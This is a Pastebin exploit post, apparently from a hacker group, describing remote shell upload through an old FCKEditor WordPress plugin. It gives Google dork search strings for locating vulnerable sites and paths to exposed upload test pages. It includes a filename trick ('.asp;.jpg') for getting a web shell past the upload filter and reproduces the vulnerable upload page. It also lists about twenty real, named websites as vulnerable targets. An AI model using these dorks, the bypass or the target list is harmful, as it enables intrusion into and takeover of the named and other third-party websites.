API tools faq
paste
KingSkrupellos

WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Shell Upload

KingSkrupellos
Dec 19th, 2018
532
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.22 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Remote Shell Upload Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 20/12/2018
  6. # Vendor Homepage : wordpress.org/support/plugin/fckeditor-for-wordpress-plugin
  7. # Software Download Link : github.com/kcloze/kcloze-blog/archive/master.zip
  8. + github.com/kcloze/kcloze-blog/tree/master/wp-content/plugins/fckeditor-for-wordpress-plugin
  9. # Tested On : Windows and Linux
  10. # Category : WebApps
  11. # Version Information : 2.0 ~ 2.2 ~ 2.6.2 ~ 2.8.4 ~ 3.3.1
  12. # Exploit Risk : Medium
  13. # Google Dorks : inurl:''/wp-content/plugins/fckeditor-for-wordpress-plugin/''
  14. + intext:''DESIGN BY PURR.''
  15. + intext:''powered by WordPress. InBiz theme made it free by desain web. Hosting by rozhled.cz''
  16. + intext:''Site entraîné par WordPress | Connexion | Flux (RSS) des articles | Thème Arthemia de Michael Jubel | Stats''
  17. + intext:''designed by Portland Web Design''
  18. + intext:''© 2009 websitemagix.com powered by fotomagix''
  19. + intext:''powered by fotomagix''
  20. + intext:''realizace webu: Pavel Gloss''
  21. + intext:''© 2008 - 2018 Heather Richards Live | All Rights Reserved.''
  22. + intext:''Powered by WordPress ( WordPress Deutschland ) - Handcoded by Tommaso Baldovino -
  23. German translation and modification by Schwarze Dame''
  24. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  25. + CWE-434: Unrestricted Upload of File with Dangerous Type
  26. # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
  27.  
  28. #################################################################################################
  29.  
  30. # Exploit :
  31.  
  32. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  33.  
  34. /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
  35.  
  36. /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/frmupload.html
  37.  
  38. /wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/browser.html
  39.  
  40. # Directory File Path :
  41.  
  42. /wp-content/uploads/.....
  43.  
  44. /wp-content/uploads/[YEAR]/[MONTH]/......
  45.  
  46. #################################################################################################
  47.  
  48. # Note : Select PHP extension and then Try to upload as .asp;.jpg filename shell extension.
  49.  
  50. # Note : This plugin fckeditor-for-wordpress-plugin contains a very serious vulnerability that allowed hackers to gain full control –
  51.  
  52. modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website,
  53.  
  54. a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the plugin’s directory.
  55.  
  56. #################################################################################################
  57.  
  58. Vulnerable File Code => /uploadtest.html
  59.  
  60. *************************************
  61.  
  62. <!--
  63. * FCKeditor - The text editor for Internet - http://www.fckeditor.net
  64. * Copyright (C) 2003-2007 Frederico Caldeira Knabben
  65. *
  66. * == BEGIN LICENSE ==
  67. *
  68. * Licensed under the terms of any of the following licenses at your
  69. * choice:
  70. *
  71. * - GNU General Public License Version 2 or later (the "GPL")
  72. * http://www.gnu.org/licenses/gpl.html
  73. *
  74. * - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
  75. * http://www.gnu.org/licenses/lgpl.html
  76. *
  77. * - Mozilla Public License Version 1.1 or later (the "MPL")
  78. * http://www.mozilla.org/MPL/MPL-1.1.html
  79. *
  80. * == END LICENSE ==
  81. *
  82. * Test page for the "File Uploaders".
  83. -->
  84. <html>
  85. <head>
  86. <title>FCKeditor - Uploaders Tests</title>
  87. <script type="text/javascript">
  88.  
  89. function SendFile()
  90. {
  91. var sUploaderUrl = cmbUploaderUrl.value ;
  92.  
  93. if ( sUploaderUrl.length == 0 )
  94. sUploaderUrl = txtCustomUrl.value ;
  95.  
  96. if ( sUploaderUrl.length == 0 )
  97. {
  98. alert( 'Please provide your custom URL or select a default one' ) ;
  99. return ;
  100. }
  101.  
  102. eURL.innerHTML = sUploaderUrl ;
  103. txtUrl.value = '' ;
  104.  
  105. frmUpload.action = sUploaderUrl;
  106. if (document.getElementById('cmbType').value) {
  107. frmUpload.action = frmUpload.action + '?Type='+document.getElementById('cmbType').value;
  108. }
  109. frmUpload.submit() ;
  110. }
  111.  
  112. function OnUploadCompleted( errorNumber, fileUrl, fileName, customMsg )
  113. {
  114. switch ( errorNumber )
  115. {
  116. case 0 : // No errors
  117. txtUrl.value = fileUrl ;
  118. alert( 'File uploaded with no errors' ) ;
  119. break ;
  120. case 1 : // Custom error
  121. alert( customMsg ) ;
  122. break ;
  123. case 10 : // Custom warning
  124. txtUrl.value = fileUrl ;
  125. alert( customMsg ) ;
  126. break ;
  127. case 201 :
  128. txtUrl.value = fileUrl ;
  129. alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
  130. break ;
  131. case 202 :
  132. alert( 'Invalid file' ) ;
  133. break ;
  134. case 203 :
  135. alert( "Security error. You probably don't have enough permissions to upload. Please check your server." ) ;
  136. break ;
  137. default :
  138. alert( 'Error on file upload. Error number: ' + errorNumber ) ;
  139. break ;
  140. }
  141. }
  142.  
  143. </script>
  144. </head>
  145. <body>
  146. <table cellSpacing="0" cellPadding="0" width="100%" border="0" height="100%">
  147. <tr>
  148. <td>
  149. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  150. <tr>
  151. <td nowrap>
  152. Select the "File Uploader" to use:<br>
  153. <select id="cmbUploaderUrl">
  154. <option selected value="asp/upload.asp">ASP</option>
  155. <option value="aspx/upload.aspx">ASP.Net</option>
  156. <option value="cfm/upload.cfm">ColdFusion</option>
  157. <option value="lasso/upload.lasso">Lasso</option>
  158. <option value="perl/upload.cgi">Perl</option>
  159. <option value="php/upload.php">PHP</option>
  160. <option value="py/upload.py">Python</option>
  161. <option value="">(Custom)</option>
  162. </select>
  163. </td>
  164. <td>
  165. Resource Type<br />
  166. <select id="cmbType" name="cmbType">
  167. <option value="">None</option>
  168. <option value="File">File</option>
  169. <option value="Image">Image</option>
  170. <option value="Flash">Flash</option>
  171. <option value="Media">Media</option>
  172. <option value="Invalid">Invalid Type (for testing)</option>
  173. </select>
  174. </td>
  175. <td nowrap>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  176. <td width="100%">
  177. Custom Uploader URL:<BR>
  178. <input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled type="text">
  179. </td>
  180. </tr>
  181. </table>
  182. <br>
  183. <table cellSpacing="0" cellPadding="0" width="100%" border="0">
  184. <tr>
  185. <td noWrap>
  186. <form id="frmUpload" target="UploadWindow" enctype="multipart/form-data" action="" method="post">
  187. Upload a new file:<br>
  188. <input type="file" name="NewFile"><br>
  189. <input type="button" value="Send it to the Server" onclick="SendFile();">
  190. </form>
  191. </td>
  192. <td style="WIDTH: 16px">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
  193. <td vAlign="top" width="100%">
  194. Uploaded File URL:<br>
  195. <INPUT id="txtUrl" style="WIDTH: 100%" readonly type="text">
  196. </td>
  197. </tr>
  198. </table>
  199. <br>
  200. Post URL: <span id="eURL">&nbsp;</span>
  201. </td>
  202. </tr>
  203. <tr>
  204. <td height="100%">
  205. <iframe name="UploadWindow" width="100%" height="100%" src="javascript:void(0)"></iframe>
  206. </td>
  207. </tr>
  208. </table>
  209. </body>
  210. </html>
  211.  
  212. #################################################################################################
  213.  
  214. # Example Vulnerable Sites =>
  215.  
  216. [+] steamykitchen.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  217.  
  218. [+] n-vac.co.jp/tool/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  219.  
  220. [+] senftenberg.cz/wordpress/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  221.  
  222. [+] ville-rochefortdugard.fr/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  223.  
  224. [+] jalak.eu/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  225.  
  226. [+] carolwhitemarketing.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  227.  
  228. [+] etkingrup.com.tr/haber/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  229.  
  230. [+] zohnertheater.ch/amberroad/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  231.  
  232. [+] gialongvn.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  233.  
  234. [+] websitemagix.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  235.  
  236. [+] taiyaki-ya.com/wp/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  237.  
  238. [+] locthanhphat.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  239.  
  240. [+] zko157.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  241.  
  242. [+] duolongo.se/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  243.  
  244. [+] sof.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  245.  
  246. [+] heatherrichardslive.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  247.  
  248. [+] textmah.com/sites/zane/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  249.  
  250. [+] nongngucolam.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  251.  
  252. [+] drogy-sos.sk/photoland/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  253.  
  254. [+] kukk.de/affiliateblog/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  255.  
  256. [+] nttprov.go.id/penghubung/web/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
  257.  
  258. #################################################################################################
  259.  
  260. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  261.  
  262. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!